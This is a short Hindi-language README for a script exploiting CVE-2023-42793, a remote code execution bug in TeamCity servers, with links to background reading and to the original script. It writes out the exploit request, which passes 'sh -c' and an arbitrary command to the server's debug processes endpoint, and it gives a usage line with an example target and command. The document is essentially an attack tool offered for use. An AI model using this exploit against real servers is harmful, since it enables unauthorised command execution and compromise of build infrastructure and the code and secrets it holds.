
teamcity-exploit-cve-2023-42793
cve-2023-42793 बग का एक त्वरित एक्सप्लॉइट स्क्रिप्ट। एक्सप्लॉइट पर कुछ अतिरिक्त पठन सामग्री यहाँ मिल सकती है:
https://www.cnblogs.com/LittleHann/p/17843271.html
यह स्क्रिप्ट RCE बग को ट्रिगर करने के बाद कमांड निष्पादित करने के लिए "params" का स्वतंत्र रूप से उपयोग करने की क्षमता जोड़ता है:
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
Usage: <base_url> <port> <command>
./TeamCity.sh blah.com 8111 "ls -lah"
मूल स्क्रिप्ट यहाँ है, पूरा श्रेय उन्हें जाता है: https://github.com/Zenmovie/CVE-2023-42793